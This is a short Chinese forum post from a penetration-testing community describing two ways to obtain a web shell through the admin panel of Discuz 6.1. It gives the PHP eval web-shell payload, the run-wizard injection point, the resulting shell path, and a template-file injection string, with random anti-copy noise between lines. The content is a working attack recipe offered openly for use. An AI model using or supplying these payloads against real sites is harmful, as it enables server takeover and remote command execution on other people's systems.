中国网络渗透测试联盟
标题:
discuz6.1后台拿shell方法
[打印本页]
作者:
admin
时间:
2012-9-13 16:59
标题:
discuz6.1后台拿shell方法
discuz6.1两种方法后台拿shell
* g$ o" Q+ }. l2 P9 \
好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下
7 x, r) e- V/ ]7 I! |
1:
. h6 f; V' k% g7 S' v3 T$ ~! j
http://127.0.0.1/discuz/admincp. ... zard&frames=yes
9 k; F+ P: [* {4 C
admincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell
0 I" [' _! ~. O' Z: L
<?php eval($_POST[cmd]);?>
: R5 Y) A/ [8 N% W8 D
后台webshell地址:
http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php
}: [' j: j2 t( C! \% t
! ^+ H6 Y" s( |4 m4 i
5 ?3 }, w; N8 P2 x. W5 l- Z$ g
2:后台模板管理--默认模板套系--详情
" B5 A( ~+ }% ]2 x) V7 H0 z
templates/default/actions.lang.php
6 i+ v1 ^% U- q2 P& ?8 x9 C4 P
jhackj\\');eval($_POST[cmd])?>;//
1 _' g/ w# f. K8 u% J* t$ g% ]& R
* o: ~. H, q5 F) P. y) Q
利用很简单,聪明的人一看就懂了
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2